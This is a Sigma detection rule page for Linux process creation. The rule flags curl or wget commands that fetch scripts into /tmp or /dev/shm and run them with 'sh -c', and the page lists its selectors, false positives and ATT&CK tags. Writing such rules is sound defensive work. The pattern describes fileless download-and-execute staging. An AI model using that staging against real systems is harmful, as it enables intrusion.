Detectionhighexperimental
Suspicious Download and Execute Pattern via Curl/Wget
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Launch
Log Source
LinuxProcess Creation
ProductLinux← raw: linux
CategoryProcess Creation← raw: process_creation
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
Detection Logic
Detection Logic3 selectors
detection:
selection_downloader:
CommandLine|contains:
- '/curl'
- '/wget'
selection_tmp:
CommandLine|contains:
- '/tmp/'
- '/dev/shm/'
selection_executor:
CommandLine|contains: 'sh -c'
condition: all of selection_*False Positives
System update scripts using temporary files
Installer scripts or automated provisioning tools
MITRE ATT&CK
Tactics
Sub-techniques
Rule Metadata
Rule ID
a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
Status
experimental
Level
high
Type
Detection
Created
Tue Jun 17
Author
Path
rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml
Raw Tags
attack.executionattack.t1059.004attack.t1203